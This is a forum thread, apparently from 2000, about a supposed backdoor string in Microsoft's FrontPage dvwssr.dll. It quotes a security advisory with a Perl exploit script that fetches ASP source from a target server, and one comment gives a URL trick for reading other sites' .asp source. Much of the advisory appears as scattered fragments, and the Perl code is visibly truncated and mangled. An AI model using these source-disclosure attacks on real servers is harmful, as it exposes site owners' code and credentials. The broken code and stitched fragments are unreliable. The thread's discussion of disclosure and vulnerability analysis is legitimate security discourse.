You know that there's rivalry between competing companies, and they discuss how much their competition sucks. I was disappointed after Apple directed that it's coders stop putting in Easter eggs, and their own names in products, and I was worried that this would keep other people from doing things like this. It's good to see this habit is still there from the days of old.
I think some peoples complaints about this are a bit exaggerated because it's M$. If Netscape or anyone else tossed in an insult about MS somewhere (and you what I'm talking about Rick
Take a look here
for a decent explaination. It's from Russ Cooper from NTBugtraq, who usually has some pretty good contacts. Basically, the exploit is not as far reaching as people think. The attacker needs to already have permissions to edit a website on the server. Then they can change another user's site.
Jason
> !pu dekcuf sreenigne tfosorciM
;-)
Okay, you get a +1 funny for you signature alone
25% Funny, 25% Insightful, 25% Informative, 25% Troll
*sigh* /me forgets you can't post and moderate in the same thread... what a stupid rule.
25% Funny, 25% Insightful, 25% Informative, 25% Troll
It's good of Russ to have get a public statement out there, but I've yet to see anything about this actually *on* NT Bugtraq.
Personally, I'd rather see statements sent out to his subscribers than to other press outlets. Go ahead, call me crazy.
Good to know. But does this mean that after deleting the file you can no longer do FrontPage authoring? That's kind of the point of having them there in the first place...
Nah, it just looks like a revision attribution header to me. Hang on.... Jkatzman???
Jon Katz works for MS shock!!!
Seriously, I'm really craving some fact about now. We've got three reports from newspapers, two of which are re-runs of the original one, and all of which are from mainstream sources not historically always 100% accurate with technical matters.
Judging my Microsoft's description of dvwssr.dll, it's there to allow authorised users to download the ASP source of a page; therefore, the break-in potential is on a par with the ::$DATA exploit that some webmasters have not yet fixed. Wise script authors try to avoid putting sensitive data (eg. database login details) in scripts, but there is still potential for break-ins.
But we still don't know if this is exploitable. I haven't got a FrontPage client or server here to try it on, but someone must be able to have a go. Why is there still no word from Microsoft? We'll all look rather silly if we've been ranting here about a simple hidden message. Hell, I hide daft quotes and stuff like that in my binaries all the time, specifically for hackers to find.
--
This comment was brought to you by And Clover.
They should have added "using non-free server software" after that...
It's 11pm, do you know what your deamons are up to?
No, not odd at all, just incomplete.
You have to delete a lot more than one single file to get all the bugs out...
It's 11pm, do you know what your deamons are up to?
I'll do it for cheesy poofs.
Here it is. Not too much of a problem unless your authoring permissions are messed up or your hosting multiple domains.
- --------------------------
- -------------------------- - --------------------------
.dll in .asp (and .asa) files under the web root,
.dll--however, anyone with web authoring .asp code of other virtual sites on the same
.dll as part of
.dll). Being the curious pup that I am, I decided to take a look.
.dll versions, I see that the other ISAPI .dlls
;)
.dll
/file/to/retrieve/source
/_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n";
p qrstuvwxyz0123456789";
:/
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
"Netscape engineers are weenies!"
A back door in Microsoft FrontPage extensions/authoring components
------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net
Table of contents:
-1. The short
-2. The long
-3. The code
-----------------------------------------------
"...we love a good conspiracy theory as much as the next person..."
- secure@microsoft.com
-----------------------------------------------
UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA
-----------------------------------------------
--[ 1. The short
The NT 4 Option Pack ships with a particular ISAPI
/_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft
FrontPage extensions (the version I have is 3.0.2.1105). This particular
.dll allows you to read
providing you know the 'password' (obfuscated encoding scheme) of which to
ask it. And, as implied by the title, the constant key used in the
encoding is "Netscape engineers are weenies!".
I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to
be used with InterDev 1.0. Therefore deleting it will affect InterDev
1.0's 'View Links' function. Also, the default permissions don't allow
for anonymous users to use the
can, and I've seen few sites that have allowed permission (which is more
due to a misconfiguration on their part). As Microsoft has told me, the
immediate problem is moreso the fact that any developer of one particular
virtual site can download the
system.
--[ 2. The long
In the fairly recent light of Mr. Cuartango's finding of a backdoor in the
authentication of Microsoft installation packages, Microsoft
(secure@microsoft.com actually) stated to Bugtraq that the automatic
acceptance of Microsoft packages is to "improve our customers' experience
while downloading software from Microsoft web sites."
Well, so let me relate how Microsoft has included an ISAPI
the FrontPage extension package/Option Pack/Visual Interdev, to "improve a
hacker's experience while downloading software from your web site".
I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me
that dvwssr.dll looked like it was a backdoor, and that it contained the
string 'Netscape engineers are weenies!'(although, it's found backwards in
the
Using some prior research code attempts at cracking the encoding algorithm
(herein referred to as the 'weenie algorithm'), I used a test ISAPI app
Alf sent to figure out what the hell this thing was for, and what it is
supposed to do. Searches on Microsoft's site said it was to 'verify
URLs'. However, I could not find any references to it elsewhere, and even
decompilation of the various FrontPage extension applications, FrontPage
clients, and Interdev clients yeilded no calls or references to dvwssr.dll
that I could see; however, I was later told that Interdev 1.0 requies this
.dll. Microsoft's site had dvwssr.dll down on the manifest for various
FrontPage packages/installations.
So, taking a peek at the
that make up the core of FrontPage extensions are of version 3.0.2.1105,
while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was
recently introduced into the pack by Microsoft (if you don't know,
FrontPage was an original program developed by Vemeer Technologies Inc;
hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer
engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers
left it in there. You would think some sort of Q&A and/or audit would
catch it if it already existed...
I'm not going to get into the exact details of the weenie encoding
algorithm--after all, you have the code below. It's basically a 62
character slide-rule type of encoding.
Luckily, from my auditing, this is not included with any other versions of
FrontPage (including Unix), and in the versions I found it on, ACLs
prevented its use (only System and Administrators were allowed full
access); I was told by MS that only individuals with web authoring
permission can use it, which is more than I had originally thought. But
it's not as widespread as, say, RDS.
Regardless of it's actual purpose, or Microsoft's intent, I think the core
interesting issue is that Microsoft literally coded (or allowed) a
who used a static key such as 'Netscape engineers are weenies!'.
In any event, if you don't use Interdev 1.0, you can delete the file and
call it a day. If you do use Interdev 1.0, well, it's your call, but I
suggest an upgrade.
--[ 3. The code
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host
#
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET
print sendraw($url);
sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno
#
#
my $key="Netscape engineers are weenies!";
#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp = length($key)){ $kc=0;}
}return $to;}
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
--[ 4. The End
I know this is short and not with it's usual flare. I apologize...I have
been running around like mad, and basically don't have the time or energy
to expend into this.
- rain forest puppy
Special thanks to Alf Serer, the founder of this bug; also, special thanks
to attrition.org (especially McIntyre) for helping me wrangle this. I'm
currently in the UK, so if you have immediate questions, I suggest you
send an email to Alf or the Attrition staff (staff@attrition.org).
Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary
Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More
info at www.dursec.com.
------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net
Regardless if Netscape engineers are weenies, Microsoft engineers
are definately pompous
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
Try the following URL on any .asp file running on a M$ IIS Server - o urfile.asp%20&CiRestriction=none&CiHilit eType=Full
http://www.yoursite.com/null.htw?CiWebHitsFile=/y
Microsoft published a patch for it, but i'm still able to get most Source-Codes of the net's most popular sites w/o any problems...
Enjoy!
To the fool, he who speaks wisdom will sound foolish. ---Euripides
Please read this ZDNet story: /000414/15/doubt-cast-on
http://news.excite.com/news/zd
As you'll see this is nothing more than a bug in an older version of Microsoft's software. The artilce states, While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users..
Sig goes here
Perhaps so. But does that make MS look better, or worse?
Depends on your perspective I suppse - you could argue it either way. This level of incompetence in such a serious project for MS - given their push to dominate the server business - would seriously harm their credibility in the market, and could lose them a lot of business and the trust (don't ask me why) of a lot of current clients. They will now be wary of other holes as you say, and I agree that, intentional or not, this will be a huge blow for MS.
Heads will be rolling at MS's programming team - they'll be needing plenty of scapegoats for this one :)
Things like user validation scripts, userID/PWD for that database on the "secure" server next door.
If you (the IIS developer guy) know what you are doing, a hacker reading your global.asa is no big problem. If you count on that nobody will ever see that source (aka security through obscurity) You are in big trouble.
Sort of like putting your login script on the web.
All opinions are my own - until criticized
The article states Windows 2000 is not affected,
so here's the only reason why anyone should update to Windows 2000 and pay yet another $1,000,000,000 to M$ and its hardware partners...
This message is provided under the terms outlined at http://www.bero.org/terms.html
Add the language 'ie-ee' to your language settings and move it all the way to the top.
Then press the Search button (make sure the function hasn't been modified by your ISP), and press Customize (or whatever, I'm only familiar with the german version of IE)
Then, you'll get a Godzilla type lizard being squashed by a IE logo.
Well, there was a reply to the above post on ntbugtraq by Gerardo Richarte who says that there is a security hole in the dll. The exploit code is included in the post.
The news sources are apparently not entirely correct about there being a back door. Here are links from some of the folks actually investigating the problem. http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=2576 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3016 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3152 http://www.ntbugtraq.com/default.asp?pid=36&sid=1& A2=ind0004&L=ntbugtraq&F=&S=&P=3251
Oops, the shift key stuck and accidentally submitted a blank form. Anyways, this poster is correct. Not only does the password have nothing to do with any possible exploit, nobody is actually able to reproduce the exploit, making the entire media-hyped report seem inaccurate at this point.
Jeff
Why don't you just drop NT and those customers, so that you can concentrate on being a Linux- based web provider? The money you lose will repay itself in the headaches you'll get rid of when you trash NT. Plus, you'll be able to target customers who want Linux: "We don't run NT! We specialize in Linux!"
--Keith
Visual Interdev 6 contains a dll, MDT2LV.DLL, which also contains the string. Apparantly to keep compatible with old visual interdev 1.0/old frontpage extensions websites. According to my dissassembled dvwssr.dll, it's used to crypt/decrypt the querystring passed to it by the requestobject.
Not a backdoor for sure. It's just now EASY to sniff traffic to a website, from an visual interdev 1.0 client/frontpage 1/2.0 client to a webserver with these extensions, decode the strings, then possibly get the username/password and THEN brake in.
Visual Interdev 6 uses a different scheme to communicate with the server, so it's just for old visual interdev 1.0 users (are there any left?) and old frontpage users who are vulnerable.
so NOT a backdoor. stop the presses.
--
Never underestimate the relief of true separation of Religion and State.
From MSDN: So it CAN be that there is a backdoor in the DLL, if it surpasses the checks on ACL's on the files to be accessed. If you delete the DLL, you can't edit the pages ONLINE via MS Frontpage. The reason some people use Frontpage extensions is because of this. It's highly recommended to use OR the much more secure VIdev Online edit/publish functionality, or just edit offline. (duh:)).
So, deleting the file won't harm runtime behaviour, it will harm edit behaviour with MS Frontpage. Well... now that's a bummer
--
Never underestimate the relief of true separation of Religion and State.
I think the idea is based on the concept of taking a bomb on a plane, so that you know that if there is a bomb, you have it and you know you won't set it off.
The idea here is that since there are going to be n security flaws, Microsoft might as well know where they are, so they put in deliberate ones.
Have you purchased the latest version of Microsoft's Forced Migration(TM)? It has nifty new features like fixes for some of the bugs in the last version of MS Forced Migration(TM). Without question it is a much better piece of software than Forced Migration 95(TM) and Forced Migration 98(TM). We have even fixed some of the bugs we intentionally placed in the previous code in order to give you a better user experience. Microsoft has been working hard to innovate every aspect of Forced Migration and we hope that the motivation to buy the latest release will come to you soon!
--
He lives in a world where those who do not run the client software of the omnipresent meme are unacceptable.
Ah, but the peer review that takes place is by external groups, no doubt. No one who has a vested interest in the software being made available quickly.
Heck the company I work for has a QA dept. that is great and doesn't care how long they delay things.
The company I used to work for is run by Steve Barkto (it's an alias, do a search - actually here I did one for you) and often the QA dept. there would be rushed... much to the chargin of others later. No suprise considering the leader is former MS.
BlackNova Traders
IANAL (;-) but I wonder if Netscape would have a defamation case against M$ if they brought this to court ? After all, it has now been proven that M$ published something which defames their engineers (albeit slightly cryptically). Anybody care to comment ?
He took it down.
here's the e-mail I exchanged with him...
At 10:28 AM 4/14/2000, you wrote:
>I have to tell you, I quite a bit dissapointed by this
>commentary:
>
>There are scary implications here. When you cannot
>trust software made by one of the world's largest
>software companies, what do you do when if comes to
>all the little homebrew progams that are available?
>
>I don't know if you were expecting to get flames on
>this or not, but...
>
>Indeed there are scary implications, of relying on
>closed-source proprietary software for
>mission-critical applications like web serving, not in
>comparing the relative trustworthiness of the "world's
>largest software companies" to "little homebrew
>programs". Maybe I'm taking this the wrong way, but I
>take offense at this as it seems to imply that some
>betrayal of trust by Microsoft makes software created
>by private individuals even less trustworthy.
>
>Shame on you.
This was not actually the intent of that remark at all, but I can
definitely see the concern. considering that, along with the fact that
we
generally don't make such comments, I removed the remark.
Thanks for bringing your concerns to my attention, my apologies for any
offense taken.
--
Stephen Heaslip (Blue)
http://www.bluesnews.com/
All the carnage, no messy cleanup...
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
All the posts above make some good points, but the topic is being discussed as if the question is "How much should a software firm focus on Quality Assurance?" I'd rather get all philosophical and open up a broader question: "What does it take to get people/organizations to produce quality work?"
I think all the open-sourcers(?) know that, despite all the argument over tangible benefits of open source development (in software or civil engineering), one thing that is guaranteed by this system is a true, deep-seated interest, maybe even passion, for the work that is being done. The profit motive puts the actual product way lower on the worker's priority list: after the paycheck, the career advancement, etc.
If you ask me, M$ software (to keep slagging on the obvious target) is comparable to those cheap plastic toys that are produced on the wings of a new fad. The idea for the product starts in the marketing department, with the hope of riding the wave of some new fad. The product needs only to be as good as it takes to convince people to buy it: there's no committment to the longer-term. Now, when a civil engineer designs a bridge, I'd bet that s/he has a vision somewhere in the mind of people viewing that bridge fifty years from now and going "Now that's a good bridge!" GPL+(value-added-services) is one way to provide a "niche" in the economy for people who are motivated by their visions. But, as we've all heard, everyone must be a salesman in the 21st C. This is how we survive in the "dog-eat-dog" world.
Now, I realize that I've been going off on tangents, but I guess the main thing is: this isn't a question about programming, or, hell, even strictly about business models. It's about how we relate to each other, and about what motivates us to do the things we do. Open source programmers are accomplishing two things at once: they're creating cool, cheap software, and they're changing the whole logic of group decision making. The result: a superior product at a competitive price.
----
Not to be confused with Col.
"And the geek shall inherit the Net..."?? :)
The Mongrel Dogs Who Teach
How often is there a MS peice of software that isn't released without a back door? How else do we expect Billy G to take down sites against him? But, Honestly, i am not surprised. There web servering applications aren't always the most secure, and anything being access by the net has the potential to be insecure. MS are just better at it than others.
Oh sure, we have the source code for DES, but it's packed with tables and tables and tables of magic numbers. How were they chosen? Why is there a 14 at row 1, column 1, of table S1? The how and why of S box determination is ***still*** classified to this day. Until I know how these numbers were chosen, I have no choice but to assume that it ebtails some sort of back door to let Feds (or some lucky h4xx0r who stumbles upon the back door) quick and easy access to my data. Because of the potential of a very quick unrraveling of DES security, having everyone rely on it (esp. the world's banking systems) is setting the world up for disaster. "Not cracked yet" is not a sufficent proof of a crypto-alg's security. This could be just like Microsoft.
This is a quote from the leading online gaming source, Blue's News.
There are scary implications here. When you cannot trust software made by one of the world's largest software companies, what do you do when if[sic] comes to all the little homebrew progams that are available?
This is exactly the mentality that keeps open-source from advancing. As strange as it may seem, the corporate world does not see open-source software go through the same sort of rigorous QA that (they assume) corporate products go through. An event such as this is only going to serve to make people doubt more software in general and that has a negative effect on open-source software which already has to face the FUD about its quality.
No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.
Since a link is only been given on the Wall Street Journal (pay site), Here's an associated press article on this:
T ORYID=APIS73RF7J80
http:// wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&S
Sorry to weasel into a reply to the first comment here with this...
--
InternetNews Radio (http://stream.internet.com/)
has an audio interview (April 14, 2000) with Rain Forest Puppy who discovered and was able to exploit the backdoor.
Note: Available as an MP3!
-- Don't Tase me, bro!
Absolutely. And don't forget to further fortify it by XOR'ing it a few times with a long string of zeroes.
/* The beatings will continue until morale improves. */
One of the biggest endightments of proprietary commercial software is the fact that when a problem is doscovered the first people to move into action from the the company concerned are the marketing department, usually in full denial mode.
What users need is an immediate alert that a problem exists, followed by a fulfilled promise to get a technical team on it until its resolved, after which a release will be made ASAP. What they get is 'There is no problem' then 'Ok, theres a problem, but its not that bad' followed belatedly by 'Alright, it was a major issue, but look the fix is here now. Just pay for the upgrade'
With open source the answer might be 'We'll work on it as soon as we can' but at least theres no denial phase.
Usually there are all sorts of get out clauses in software licenses to excuse a company from any liability for problems that bugs might cause, but what about the case where a problem is discovered by the company that could be potentially fincancially damaging to its clients but it refuses to issue notice of the problem in a timely fashion?
ZamZ
I pretty much agree with your sentiment, it was incredibly unprofessional.
On the other hand, I don't think open source is completely immune to this either -- after all, don't they have code reviews at Microsoft? Nothing really prevents a Red Hat engineer from doing something equally stupid. For that matter, the backdoor in question is not necessarily in the official source, is it? It could have been slipped in in binary form.
You can't be absolutely complacent, unless you both compile everything on your system from source and review all the source code before compiling. Even then you can't really be sure without dumping the object code (remember the old Unix password hack built into the C compiler?).
If you consider most root exploits such as the one that came out in bind last year, most of them are bugs. It wouldn't be too hard to deliberately introduce such bugs so they would pass casual inspection. Another proof that whoever did this was an idiot.
Open source's advantages over closed source for security are relative, not absolute. As in bug fixes, things can be disocvered faster and fixed faster.
Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
http://www.nytimes.com/a ponline/f/AP-Microsoft-Password.html...still not very in depth..
Doesn't it strike you as odd that removing a file is a bugfix?
/vmlinuz, it'll work after that."
Questions arise: 1) Why was it there? 2) What will removing it break? and 3) What the heck kind of bugfix is deleting a file in the first place?
"My kernel is panicking on boot!" "Delete
I will never fully understand Microsoft Corp., its methods, or its software.
Microsoft: bringing you yesterday's technology tomorrow.
OFTC: By the community, for the community
Hrm.
According to the stories, Frontpage 2000 on Windows 2000 isn't affected.
As The Register puts it, per the link above:
The problem isn't there in Win2k servers with FrontPage 2000 extensions, so an upgrade might be a good idea. But not necessarily to Win2k.
Hrm.
Ok, Windows 2000 isn't jumping off the shelves. Problems are grounding it. So... maybe its time to "leak" a old backdoor, so that people would upgrade to 2000 ASAP?
Granted, those who thought would be saying "What problems will we have there" - but by and large - the people who think aren't running NT (especially for webserving).
(Not an NT bash, BTW. I'm talking about the vast majority of tossed-up NT servers who fill needs, and then massive effort is spent _fixing_ problems, performance, etc, rather than sitting down, building a good solution, and doing it right. (Personal opinion, NT shouldn't be there, but in those cases, some valid cases can be made for NT).
I just... Surely not. Surely this is just a coincidence. But... I've *got* to wonder..
Addison
*If* this is true, this is supposed to be representative of a responsible and respected company? And why only one thin report on something so serious? IF this is true, I still don't understand how Microsoft thinks they have any business releasing software with Internet functionality anymore. Intranet, sure. Internet? No way.
spam, spam, spam, spam, e-mail, news and spam.
Okay, this is a truly bad hole in Microsoft's server software, and one which should never have been there in the first place. And while many people here may scream conspiracy, I don't think that it was. Rather I think this was a case of coders doing something without the knowledge of the designers / policy makers or whatever.
Think about it. Why would Microsoft want this put into their software, when if it was found out, which would be likely, would lead to a massive publicity scandal, and possible legal action? This wouldn't be in their best interests at all, especially given the current events.
Rather, this sounds like the sort of thing coders would do, especially the part about Netscape employees being "weenies". Given that MS employees are loyal to MS, this kind of thing sounds like something they would choose on their own, just because they thought no-one would notice it.
Thrilling. I love it. The greatest thing is that I'm sitting here with dvwssr.dll open in a text editor. The password is stored in cleartext. Backwords, yes, it took me a full thirty seconds to find it. Oh yes here it is:
!seineew era sreenigne epacsteN
You think they could've, I dunno, ENCRYPTED IT? I mean, its one thing (unscrupulous as it is) to put a backdoor in software, but its just plain stupid to store the p/w in cleartext on every machine that runs frontpage in the world.
Gah
...it would never have been there in the first place. Most of us would be embarassed to open up such obvious flaws in our code - peer review would never have let this happen.
Oh yeah, like this hasent happened before. I hear that microsoft has a deal with the CIA to install remote servers on all computers. So now the CIA can steal our porno!
- soy
It is, in fact, this blindness that makes corporatism (a) so evil and (b) so futile in the long run. There are values that are not economic values, and they do have the strength to compete.
The Mongrel Dogs Who Teach
we could all see what the password is.
Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
I propose a new backdoor in the Apache code. It would work something like this:
When the user types "Bill Gates is a fungus covering the streets of the cyber village" to a logged site, the server immediately spawns new processes which scour the Web looking for vulnerable IIS servers.
Upon finding these sites, it does nothing. Why would you need to do anything to a machine that runs (Af)front Page Extensions?! It already suffers from enough code-bloat to make any amount of bandwidth nearly useless.
-L
Russ Cooper just posted a more educated summary of the problem to NTBUGTRAQ. It's in the archives at this location.
It's NOT as bad as first reported. Russ says that his comment that it affects "almost every web hosting provider" was based on the info that it was some sort of Front Page issue. It's not that simple, and it seems that it's only exploitable by users who have already been granted web authoring permissions on the box.
Have fun,
Dave
--
Here's hoping this is high enough on the page that people see it. The /. story should probably be updated.
.dll. Without proper and full permissions applied
.dll in a way that's not intended...it just doesn't .dll in the first place would have the ability
From: Windows NTBugtraq Mailing List [NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]
on behalf of Russ [Russ.Cooper@RC.ON.CA]
Sent: Friday, April 14, 2000 12:33 PM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: DVWSSR.dll Vulnerability in Microsoft IIS 4.0 Web Servers
Ok, here's a breaking update.
Latest reports say that there is
NO VULNERABILITY IN DVWSSR.DLL
Yup, that's right, different again from what I said earlier, and even more
different than what I said yesterday to WSJ.
Please accept that I have followed the story published elsewhere and tried
to keep you abreast of everything I knew. Also appreciate that the amount of
time given to verify and research the claims made by others has been
extremely short. I've had probably 30 interviews today by orgs pressing for
information on the story as the feeding frenzy occurs after the first one
goes to press (WSJ in this case).
MS have had people working on this thing like madmen, trying to verify the
claims and investigate all of the possible pieces of code that may be
affected. As that research progressed, different observations were made and
so the story came out in various stages (with varying levels of
"correctness"). Had they been given a reasonable amount of time to respond,
nobody would have been in a tizzy about anything (i.e. the press would not
have cared to run this story anywhere).
Decide for yourself whether we were better served by (more) immediate
disclosure or not. I've stood where I stand for a reason, despite the
loathing of others for my stance...
In the end, it turns out that unless you actually have permissions for the
file you are requesting, you'll get an error message when you follow the
procedures outlined by RFP in his RFP2K02 advisory.
That said, understand that sites that allow connections by Front Page may
very well provide you with source asp if you request it. BUT THAT WILL
HAPPEN with or without the
across virtual servers on a given box, site leakage or manipulation by
others will always be possible in myriad ways.
>From what I've heard/seen/been told, permissions on the test servers must
have either been non-existent, incorrectly applied, or permissioned the user
across multiple virtual sites (i.e. incorrectly applied).
I had someone claim that they could get into an FP98 site using
"Netscapeengineersareweenies!" as a userID and no password...making them
think it was a backdoor userID. Fact is they could get into the same sites
using "TomDickandHarry" as a userID too. If the permissions aren't set
correctly, anything is possible.
This info may change again before its finalized. It may well be that there
is some way to use this
appear to be this one. On a box where multiple sites have not been
individually permissions, or permissions are lax or non-existent...anyone
permissioned to execute the
to simply open the other sites and manipulate them directly (i.e. no need to
do this junk with the dvwssr.dll)
Finally, to my point out the string not being a password. Elias Levy of
SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly
pointed out that using the term password to apply to that string is not
beyond the realm of understanding. The client component mtd2lv.dll and the
server component dvwssr.dll both need to know this value, and use it
correctly, for communications to work. If you try and talk directly to
dvwssr.dll and don't obfuscate your communication with the correct "key", it
won't understand you. Of course if you don't already have permissions,
knowing this value gets you nothing...hence my observation that its not a
password. Whatever it is, it appears to be meaningless junk text used as
data.
Cheers,
Russ - NTBugtraq Editor
"dot-age" (as in "we're in the dot-age") = senility (source Webster's)
--
Business. Numbers. Money. People. Computer World.
Microsoft has a Security Bulletin and a FAQ about the problem. Although it's limited, there is a vulnerability -- nothing like those password scenerios that have been bandied about, however.
Quick summary: If multiple web sites are hosted on a NT4/IIS4 server with FrontPage 98 extensions installed, then webmaster A with web authoring permissions on his own site could potentially inappropriately read the .asp (and possibly the global.asa, but no others) files of webmaster B's web site if he knew where they existed on the same server. Note that to be able to do this, user B would have had to have granted user A read permissions (explicitly, or by giving read access to "Everyone") on those files -- otherwise, user A would be unable to read the files.
Soooo, this looks like a tremendously smaller problem than everyone originally thought, although there definitely is a vulnerability for the scenario I mentioned above. Corrections welcomed if I munged any of that explanation.
Cheers,
ZicoKnows@hotmail.com
This was posted to the NTbugtraq list by Russ, the owner. If true, there are a whole damn lot of Slashdotters who made fools of themselves jumping to conclusions today. That's all I'll say about that, so, on with the post (sorry for the bold, and the entire repost, but it needs to be seen):
======= BEGIN MESSAGE =========
Ok, here's a breaking update.
Latest reports say that there is
NO VULNERABILITY IN DVWSSR.DLL
Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ.
Please accept that I have followed the story published elsewhere and tried to keep you abreast of everything I knew. Also appreciate that the amount of time given to verify and research the claims made by others has been extremely short. I've had probably 30 interviews today by orgs pressing for information on the story as the feeding frenzy occurs after the first one goes to press (WSJ in this case).
MS have had people working on this thing like madmen, trying to verify the claims and investigate all of the possible pieces of code that may be affected. As that research progressed, different observations were made and so the story came out in various stages (with varying levels of "correctness"). Had they been given a reasonable amount of time to respond, nobody would have been in a tizzy about anything (i.e. the press would not have cared to run this story anywhere).
Decide for yourself whether we were better served by (more) immediate disclosure or not. I've stood where I stand for a reason, despite the loathing of others for my stance...
In the end, it turns out that unless you actually have permissions for the file you are requesting, you'll get an error message when you follow the procedures outlined by RFP in his RFP2K02 advisory.
That said, understand that sites that allow connections by Front Page may very well provide you with source asp if you request it. BUT THAT WILL HAPPEN with or without the .dll. Without proper and full permissions applied across virtual servers on a given box, site leakage or manipulation by others will always be possible in myriad ways.
From what I've heard/seen/been told, permissions on the test servers must have either been non-existent, incorrectly applied, or permissioned the user across multiple virtual sites (i.e. incorrectly applied).
I had someone claim that they could get into an FP98 site using "Netscapeengineersareweenies!" as a userID and no password...making them think it was a backdoor userID. Fact is they could get into the same sites using "TomDickandHarry" as a userID too. If the permissions aren't set correctly, anything is possible.
This info may change again before its finalized. It may well be that there is some way to use this .dll in a way that's not intended...it just doesn't appear to be this one. On a box where multiple sites have not been individually permissions, or permissions are lax or non-existent...anyone permissioned to execute the .dll in the first place would have the ability to simply open the other sites and manipulate them directly (i.e. no need to do this junk with the dvwssr.dll)
Finally, to my point out the string not being a password. Elias Levy of SecurityFocus.com and Mark Edwards of NTSecurity.net have both correctly pointed out that using the term password to apply to that string is not beyond the realm of understanding. The client component mtd2lv.dll and the server component dvwssr.dll both need to know this value, and use it correctly, for communications to work. If you try and talk directly to dvwssr.dll and don't obfuscate your communication with the correct "key", it won't understand you. Of course if you don't already have permissions, knowing this value gets you nothing...hence my observation that its not a password. Whatever it is, it appears to be meaningless junk text used as data.
===== END MESSAGE ======
Cheers,
ZicoKnows@hotmail.com
Microsoft Design Tool - Link View
It's installed by Front Page Server Extensions 3.0. 'The FrontPage Extensions manage design-time Web permissions using the underlying security model of the host operating system on the server.'
From MSDN
Presumably the magic phrase can override permissions to expose the source code. It's
well, what you say actually could be enforced under the DMCA. I'll wager that the FP EULA doesn't allow users to decompile or strings it.
And really, it wasn't JUST encrypted backwards, it had a full double-ROT13 encryption applied before that, so even after de-backwardsing it, you still would have to take it through two rounds of ROT13 before it was readable.
Returned Peace Corps IT Volunteer
I think this discovery may have much farther-reaching implications that anybody presently realizes.
__________________________________________________ ___
rooooar
Thus proving that the closed source model is, in fact, more secure than the open source model?
--
Sheesh, evil *and* a jerk. -- Jade
dvwssr.dll is described as a "gatekeeper" for browsing, which would make sense if it is where the backdoor code lies. It is apparently part of the "FrontPage Server Extensions". The table at the link gives the
Oh, and I can't resist this quote from the linked page:One more level and one more way than it was supposed to, eh?
--
Sheesh, evil *and* a jerk. -- Jade
"Not cracked yet" happens to be the acid test for cryptosystems. Anything which has been open to public scrutiny and attack for years without being cracked is more trustworthy than something which has not. DES is losing usefulness because hardware is now fast enough to do brute-force attacks at reasonable cost, but that's something we knew would happen. If you have secrets you need to protect for the ages, you don't use DES anyway. The tradtional way of protecting these things is to use bullets, though the US government is a little bit more sophisticated; to protect some secrets known by a dying CIA director, he was scheduled for neurosurgery which destroyed his speech centers before his scheduled Congressional subcommittee appearance. Not exactly subtle, but clever.
(Is there anyone who doesn't shiver when they think of the stuff like this that spooks do?)
--
Time is Nature's way of keeping everything from happening at once... the bitch.
This seems as a heaven's gift to me for all those "security through obscurity doesn't work" advocates. We know they're right, but this event - if it is entirely true, and gets headlined in many media - would certainly help management understand that something might be wrong with their perception of how to handle security.
Surely, this event won't mean that suddenly every company will switch to an open source solution, but i firmly believe that this event is one of the many steps that happen in the evolution of perception of software and its uses.
This won't result in a sudden increase in the usage of Linux, FreeBSD or any other open source solution... It's just all matter of evolution...
... If it is solid... I mean, this sounds too good to be true, not?
Anyway, i'm on my way telling my manager "told you so!" :)
If you can delete the file dvwssr.dll this easily, without any repercussions, I wonder what it did there in the first place.
Use Adsense for Charity
Here's my theory: Not everyone at MS is happy working there, and some may even be friendly to Open Source. Instead of (or just before) leaving the Evil Empire they decide to leave a small present. Once safely out, they tip off a journalist in one of the papers that can hurt MS the most.
